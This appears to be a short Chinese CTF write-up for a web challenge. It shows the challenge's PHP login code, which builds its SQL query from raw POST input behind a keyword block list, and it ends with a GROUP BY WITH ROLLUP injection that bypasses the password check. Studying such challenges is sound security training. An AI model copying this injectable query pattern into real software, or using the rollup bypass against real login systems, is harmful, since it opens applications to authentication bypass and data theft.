【实验吧】CTF_Web_因缺思汀的绕过

<?phperror_reporting(0);if (!isset($_POST[‘uname‘]) || !isset($_POST[‘pwd‘])) { ???echo ‘<form action="" method="post">‘."<br/>"; ???echo ‘<input name="uname" type="text"/>‘."<br/>"; ???echo ‘<input name="pwd" type="text"/>‘."<br/>"; ???echo ‘<input type="submit" />‘."<br/>"; ???echo ‘</form>‘."<br/>"; ???echo ‘<!--source: source.txt-->‘."<br/>"; ???die;}function AttackFilter($StrKey,$StrValue,$ArrReq){ ?????if (is_array($StrValue)){//检测变量是否是数组 ???????$StrValue=implode($StrValue);//返回由数组元素组合成的字符串 ???} ???if (preg_match("/".$ArrReq."/is",$StrValue)==1){ ??//匹配成功一次后就会停止匹配 ???????print "水可载舟，亦可赛艇！"; ???????exit(); ???}}$filter = "and|select|from|where|union|join|sleep|benchmark|,|\(|\)";foreach($_POST as $key=>$value){ //遍历数组 ???AttackFilter($key,$value,$filter);}$con = mysql_connect("XXXXXX","XXXXXX","XXXXXX");if (!$con){ ???die(‘Could not connect: ‘ . mysql_error());}$db="XXXXXX";mysql_select_db($db, $con);//设置活动的 MySQL 数据库$sql="SELECT * FROM interest WHERE uname = ‘{$_POST[‘uname‘]}‘";$query = mysql_query($sql); //执行一条 MySQL 查询if (mysql_num_rows($query) == 1) { //返回结果集中行的数目 ???$key = mysql_fetch_array($query);//返回根据从结果集取得的行生成的数组，如果没有更多行则返回 false ???if($key[‘pwd‘] == $_POST[‘pwd‘]) { ???????print "CTF{XXXXXX}"; ???}else{ ???????print "亦可赛艇！"; ???}}else{ ???print "一颗赛艇！";}mysql_close($con);?>

mysql> select * from user where name = ‘admin‘ or 1 group by name with rollup limit 1 offset 0;